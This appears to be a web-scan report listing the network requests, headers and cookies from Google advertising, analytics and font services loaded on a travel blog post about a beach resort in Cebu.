:path: /pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=1661042523&adk=605609668&adf=2080630801&pi=t.ma~as.1661042523&w=1200&fwrn=4&fwrnh=100&lmt=1617333065&rafmt=1&to=pso&psa=0&channel=WordPressSinglePost%2Bpso-lv-5&format=1200x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065804&bpp=1&bdt=303&idt=171&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&prev_fmts=0x0%2C825x280%2C745x187&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=200&ady=86&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7CeE%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=4&uci=a!4&fsb=1&xpc=Grt5bJypV6&p=https%3A//www.itravelrox.com&dtd=174
pragma: no-cache
cache-control: no-cache
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.itravelrox.com/
accept-encoding: gzip, deflate, br
accept-language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
Referer: https://www.itravelrox.com/

Response headers

p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
content-type: text/html; charset=UTF-8
x-content-type-options: nosniff
content-encoding: br
date: Fri, 02 Apr 2021 03:11:06 GMT
server: cafe
content-length: 24041
x-xss-protection: 0
set-cookie: test_cookie=CheckForPermission; expires=Fri, 02-Apr-2021 03:26:05 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
expires: Fri, 02 Apr 2021 03:11:06 GMT
cache-control: private

POST
H3-Q050 200 collect Show response
www.google-analytics.com/j/ 1 B
69 B 13ms
13ms XHR
text/plain 2a00:1450:4001:802::200e
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://www.google-analytics.com/j/collect?v=1&_v=j89&a=999108565&t=pageview&_s=1&dl=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&ul=en-us&de=UTF-8&dt=Unwinding%20at%20Paulo%20Luna%20Beach%20resort%20in%20San%20Fernando%2C%20Cebu&sd=24-bit&sr=1600x1200&vp=1600x1200&je=0&_u=IAhAAUABAAAAAC~&jid=982474172&gjid=893499685&cid=1624794491.1617333066&tid=UA-32708500-1&_gid=288755104.1617333066&_r=1&did=dZGIzZG&gtm=2ou3o0&z=665190932

Requested by

Host: www.google-analytics.com
URL: https://www.google-analytics.com/analytics.js

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:802::200e Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

Golfe2 /

Resource Hash

6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

Security Headers

Name	Value
X-Content-Type-Options	nosniff

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
Content-Type: text/plain

Response headers

pragma: no-cache
date: Fri, 02 Apr 2021 03:11:05 GMT
x-content-type-options: nosniff
last-modified: Sun, 17 May 1998 03:00:00 GMT
server: Golfe2
content-type: text/plain
access-control-allow-origin: https://www.itravelrox.com
cache-control: no-cache, no-store, must-revalidate
access-control-allow-credentials: true
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 1
expires: Fri, 01 Jan 1990 00:00:00 GMT

GET
H3-Q050 200 integrator.js Show response
adservice.google.de/adsid/ 107 B
777 B 43ms
28ms Script
application/javascript 2a00:1450:4001:82a::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://adservice.google.de/adsid/integrator.js?domain=www.itravelrox.com

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:82a::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

a4a1824defec1084ca81d496ee77891684c26196924bdc4fc21dd3482ce15e14

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

timing-allow-origin: *
date: Fri, 02 Apr 2021 03:11:06 GMT
content-encoding: gzip
x-content-type-options: nosniff
server: cafe
p3p: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657 for more info."
cache-control: private, no-cache, no-store
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
content-type: application/javascript; charset=UTF-8
alt-svc: h3-29="googleads.g.doubleclick.net:443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051="googleads.g.doubleclick.net:443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050="googleads.g.doubleclick.net:443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046="googleads.g.doubleclick.net:443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043="googleads.g.doubleclick.net:443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="46,43",quic=":443"; ma=2592000; v="46,43"
content-length: 100
x-xss-protection: 0

GET
H3-Q050 200 integrator.js Show response
adservice.google.com/adsid/ 107 B
146 B 15ms
15ms Script
application/javascript 2a00:1450:4001:801::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://adservice.google.com/adsid/integrator.js?domain=www.itravelrox.com

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:801::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

a4a1824defec1084ca81d496ee77891684c26196924bdc4fc21dd3482ce15e14

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

timing-allow-origin: *
date: Fri, 02 Apr 2021 03:11:06 GMT
content-encoding: gzip
x-content-type-options: nosniff
server: cafe
p3p: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657 for more info."
cache-control: private, no-cache, no-store
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
content-type: application/javascript; charset=UTF-8
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 100
x-xss-protection: 0

GET
H3-Q050 200 ads Show response
googleads.g.doubleclick.net/pagead/ Frame AF47 75 KB
26 KB 532ms
532ms Document
text/html 2a00:1450:4001:82a::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=2452791592&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333066&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065805&bpp=1&bdt=305&idt=219&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=3468&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=5&uci=a!5&btvi=3&fsb=1&xpc=LK9BJI43vo&p=https%3A//www.itravelrox.com&dtd=224

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:82a::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

5bbc654f63e54ccedadf08472617f0dd1ebfba31e8f133388bdbf3e42693ff2c

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

:method: GET
:authority: googleads.g.doubleclick.net
:scheme: https
:path: /pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=2452791592&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333066&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065805&bpp=1&bdt=305&idt=219&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=3468&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=5&uci=a!5&btvi=3&fsb=1&xpc=LK9BJI43vo&p=https%3A//www.itravelrox.com&dtd=224
pragma: no-cache
cache-control: no-cache
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.itravelrox.com/
accept-encoding: gzip, deflate, br
accept-language: en-US
cookie: test_cookie=CheckForPermission
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
Referer: https://www.itravelrox.com/

Response headers

p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
content-type: text/html; charset=UTF-8
x-content-type-options: nosniff
content-encoding: br
date: Fri, 02 Apr 2021 03:11:06 GMT
server: cafe
content-length: 26090
x-xss-protection: 0
set-cookie: IDE=AHWqTUmcmkmxsQimuIxineTk6zPm2IItqqdRBtbuUgzV5JvbR_5KwHMCszXQ_SbMCDY; expires=Wed, 27-Apr-2022 03:11:06 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none test_cookie=; expires=Fri, 01-Aug-2008 22:45:55 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
expires: Fri, 02 Apr 2021 03:11:06 GMT
cache-control: private

GET
H3-Q050 200 integrator.js Show response
adservice.google.de/adsid/ 107 B
123 B 15ms
14ms Script
application/javascript 2a00:1450:4001:82a::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://adservice.google.de/adsid/integrator.js?domain=www.itravelrox.com

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:82a::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

a4a1824defec1084ca81d496ee77891684c26196924bdc4fc21dd3482ce15e14

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

timing-allow-origin: *
date: Fri, 02 Apr 2021 03:11:06 GMT
content-encoding: gzip
x-content-type-options: nosniff
server: cafe
p3p: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657 for more info."
cache-control: private, no-cache, no-store
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
content-type: application/javascript; charset=UTF-8
alt-svc: h3-29="googleads.g.doubleclick.net:443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051="googleads.g.doubleclick.net:443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050="googleads.g.doubleclick.net:443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046="googleads.g.doubleclick.net:443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043="googleads.g.doubleclick.net:443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic="googleads.g.doubleclick.net:443"; ma=2592000; v="46,43",quic=":443"; ma=2592000; v="46,43"
content-length: 100
x-xss-protection: 0

GET
H3-Q050 200 integrator.js Show response
adservice.google.com/adsid/ 107 B
123 B 15ms
15ms Script
application/javascript 2a00:1450:4001:801::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://adservice.google.com/adsid/integrator.js?domain=www.itravelrox.com

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:801::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

a4a1824defec1084ca81d496ee77891684c26196924bdc4fc21dd3482ce15e14

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://www.itravelrox.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

timing-allow-origin: *
date: Fri, 02 Apr 2021 03:11:06 GMT
content-encoding: gzip
x-content-type-options: nosniff
server: cafe
p3p: CP="This is not a P3P policy! See http://support.google.com/accounts/answer/151657 for more info."
cache-control: private, no-cache, no-store
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
content-type: application/javascript; charset=UTF-8
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 100
x-xss-protection: 0

GET
H3-Q050 200 ads Show response
googleads.g.doubleclick.net/pagead/ Frame 3A61 91 KB
20 KB 622ms
622ms Document
text/html 2a00:1450:4001:82a::2002
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=1313&slotname=1929479831&adk=1389158022&adf=3725392101&pi=t.ma~as.1929479831&w=254&cr_col=1&cr_row=6&lmt=1617333066&rafmt=9&psa=0&format=254x1313&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&crui=pub_control_image_card_stacked&wgl=1&dt=1617333065842&bpp=2&bdt=341&idt=233&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280%2C825x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=1101&ady=578&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7CeE%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=8&uci=a!8&fsb=1&xpc=iWA0bk5tzq&p=https%3A//www.itravelrox.com&dtd=237

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:82a::2002 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

66ed8e8edff95f4c369a861865b0bc70849ba7b007233874b9eb9df6c476c22b

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

:method: GET
:authority: googleads.g.doubleclick.net
:scheme: https
:path: /pagead/ads?client=ca-pub-6761611880351053&output=html&h=1313&slotname=1929479831&adk=1389158022&adf=3725392101&pi=t.ma~as.1929479831&w=254&cr_col=1&cr_row=6&lmt=1617333066&rafmt=9&psa=0&format=254x1313&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&crui=pub_control_image_card_stacked&wgl=1&dt=1617333065842&bpp=2&bdt=341&idt=233&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280%2C825x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=1101&ady=578&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7CeE%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=8&uci=a!8&fsb=1&xpc=iWA0bk5tzq&p=https%3A//www.itravelrox.com&dtd=237
pragma: no-cache
cache-control: no-cache
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
sec-fetch-site: cross-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://www.itravelrox.com/
accept-encoding: gzip, deflate, br
accept-language: en-US
cookie: test_cookie=CheckForPermission
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36
Referer: https://www.itravelrox.com/

Response headers

p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
content-type: text/html; charset=UTF-8
x-content-type-options: nosniff
content-encoding: br
date: Fri, 02 Apr 2021 03:11:06 GMT
server: cafe
content-length: 20190
x-xss-protection: 0
set-cookie: IDE=AHWqTUnAq8mxK8feip4Ax6w6Jk030xHJVvdgTTzWV1YIKsFDLzH4dvmA3yH7JM-TweM; expires=Wed, 27-Apr-2022 03:11:06 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none test_cookie=; expires=Fri, 01-Aug-2008 22:45:55 GMT; path=/; domain=.doubleclick.net; Secure; HttpOnly; SameSite=none
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
expires: Fri, 02 Apr 2021 03:11:06 GMT
cache-control: private

GET
H3-Q050 200 css
fonts.googleapis.com/ Frame 586B 2 KB
969 B 42ms
28ms Stylesheet
text/css 2a00:1450:4001:828::200a
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://fonts.googleapis.com/css?family=Google%20Sans%20Display%3A400

Requested by

Host: googleads.g.doubleclick.net
URL: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=187&slotname=1101473462&adk=1534294233&adf=336954501&pi=t.ma~as.1101473462&w=745&fwrn=4&lmt=1617333065&rafmt=11&psa=0&format=745x187&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&wgl=1&dt=1617333065802&bpp=2&bdt=301&idt=166&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&prev_fmts=0x0%2C825x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&rplot=4&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=285&ady=2239&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=3&uci=a!3&btvi=2&fsb=1&xpc=ggk2H5poe9&p=https%3A//www.itravelrox.com&dtd=169

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::200a Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

ESF /

Resource Hash

c6a305cd9f8592bbd50ddd47eb5af53952b97937e9b0c4df40498f7140ff8a49

Security Headers

Name	Value
Strict-Transport-Security	max-age=31536000
X-Content-Type-Options	nosniff
X-Frame-Options	SAMEORIGIN
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

strict-transport-security: max-age=31536000
content-encoding: gzip
x-content-type-options: nosniff
cross-origin-resource-policy: cross-origin
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
x-xss-protection: 0
last-modified: Fri, 02 Apr 2021 01:19:02 GMT
server: ESF
date: Fri, 02 Apr 2021 03:11:06 GMT
x-frame-options: SAMEORIGIN
content-type: text/css; charset=utf-8
access-control-allow-origin: *
cache-control: private, max-age=86400, stale-while-revalidate=604800
timing-allow-origin: *
link: <https://fonts.gstatic.com>; rel=preconnect; crossorigin
expires: Fri, 02 Apr 2021 03:11:06 GMT

GET
H2 200 bgl_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/elements/html/ Frame 586B 4 KB
2 KB 6ms
6ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/elements/html/bgl_fy2019.js

Requested by

Protocol

Security

TLS 1.3, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

716d7275e1e1d9dd0725ef0cb98ffb2953fd7aa5d3048394209062e80a39d956

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Thu, 01 Apr 2021 23:25:10 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 13556
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
alt-svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length: 2176
x-xss-protection: 0
server: cafe
etag: 14296419091769528085
vary: Accept-Encoding, Origin
content-type: text/javascript; charset=UTF-8
cache-control: public, max-age=1209600
timing-allow-origin: *
expires: Thu, 15 Apr 2021 23:25:10 GMT

GET
H3-Q050 200 load_preloaded_resource_fy2019.js Show response
tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/ Frame 586B 1 KB
980 B 7ms
7ms Script
text/javascript 2a00:1450:4001:828::2001
GOOGLE

General

Check archive.org

Show headers Download Go to

Full URL

https://tpc.googlesyndication.com/pagead/js/r20210331/r20110914/client/load_preloaded_resource_fy2019.js

Requested by

Protocol

H3-Q050

Security

QUIC, , AES_128_GCM

Server

2a00:1450:4001:828::2001 Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),

Reverse DNS

Software

cafe /

Resource Hash

49aea8d1206dbb5e3c8a7d4db9274d2efa2111d8b53acb901efc378b1feca381

Security Headers

Name	Value
X-Content-Type-Options	nosniff
X-Xss-Protection	0

Request headers

Referer: https://googleads.g.doubleclick.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.72 Safari/537.36

Response headers

date: Fri, 02 Apr 2021 01:28:39 GMT
content-encoding: gzip
x-content-type-options: nosniff
age: 6147
p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cross-origin-resource-policy: cross-origin
content-disposition: attachment; filename="f.txt"
